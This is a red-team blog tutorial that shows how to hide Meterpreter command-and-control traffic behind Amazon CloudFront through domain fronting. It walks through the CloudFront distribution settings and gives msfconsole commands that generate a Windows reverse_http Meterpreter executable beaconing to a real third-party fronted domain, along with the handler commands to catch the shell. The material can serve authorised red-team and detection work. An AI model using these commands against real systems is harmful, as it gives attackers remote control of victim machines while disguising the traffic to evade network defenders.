Domain Fronting with Meterpreter

Domain Fronting is a technique that is typically used for censorship evasion. It relies on popular Content Delivery Networks (CDNs) such as Amazon’s CloudFront to mask traffic origins. By changing the HTTP Host header, the CDN will happily route us to the correct server. Red Teams have been using this technique for hiding C2 traffic by using high reputation redirectors.

For more information on Domain Fronting, please refer to this whitepaper

Setting up CloudFront

Log in to AWS, and navigate to CloudFront. You will need a domain name that you own, or acquired for free from a registrar like Freenom. Once you are logged into AWS, click Create Distribution. The Origin Domain Name will be the domain that you own. You also need to match origin protocol policy (HTTP/HTTPs), so that CloudFront routes both types of traffic to you.

Origin Settings

Under Default Cache Behavior Settings, we need to tweak a few settings so that the CDN caches as little traffic as possible.

  1. Allow all HTTP methods possible.
  2. Set Cache Based on Selected Request Headers to All.
  3. For Forward Cookies, also select All.
  4. For Query String Forwarding and Caching, select Forward all, cache based on all.

Default Cache Behavior Settings

Everything else can be left at default. Click the Create Distribution button at the bottom of the page, and wait for the setup to complete within AWS.

Note: This may take some time for AWS to propagate the correct settings to the edge servers. Go ahead with the meterpreter setup while this completes.

CloudFront In Progress

Meterpreter

At the time of publishing, the Domain Fronting capability has not yet been pushed to the main distribution channels. Per the discussion here, Domain Fronting is only ready for certain payload types, and is not currently included in the main Metasploit framework. Rapid7 also hinted at Domain Fronting support in a recent blog.

Since this is not mainstream yet, we will need to grab the latest version from github for payload generation. The server is perfectly capable of handling Domain Fronting as the client simply needs to change the Host header in order to use the CDN as a redirector to our C2.

If you don’t already have a Metasploit development environment setup, there are excellent instructions here.

Choosing a Redirector

As we are using CloudFront for this demonstration, we can choose any popular domain that also utilizes CloudFront. (Vincent)[https://twitter.com/vysecurity] recently released a large list of frontable domains. For simplicity sake, I’ve chosen abrakam.com as it’s the second domain in the CloudFront list.

Meterpreter Payload Generation

In your recently installed development environment with Metasploit, start up msfconsole.

use payload/windows/meterpreter/reverse_http
set LHOST abrakam.com
set LPORT 80
set HttpHostHeader d3k1m3cdd2g9qm.cloudfront.net
generate -t exe -f /tmp/meterpreter

Note: Change the HttpHostHeader to the subdomain that AWS automatically populated for you during the distribution setup

Meterpreter Listener

On the server that you control, also startup msfconsole.

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST 0.0.0.0
set LPORT 80
exploit

Wireshark Capture

The following is a screen capture of Wireshark as the agent is connecting to our meterpreter handler. As we used the reverse_http payload, you can inspect the HTTP traffic and see that simply by changing the Host header, we were able to redirect the payload to the server of our choice.

Wireshark capture

Demo

Keep an eye out for new payloads supporting the extended HttpHost options in the advanced settings of Metasploit.

References

  1. Domain Fronting Paper
  2. Metasploit
  3. CloudFront
  4. High Reuptation Redirectors and Domain Fronting
  5. Camouflage at encryption layer
  6. Tradecraft Security Weekly
comments powered by Disqus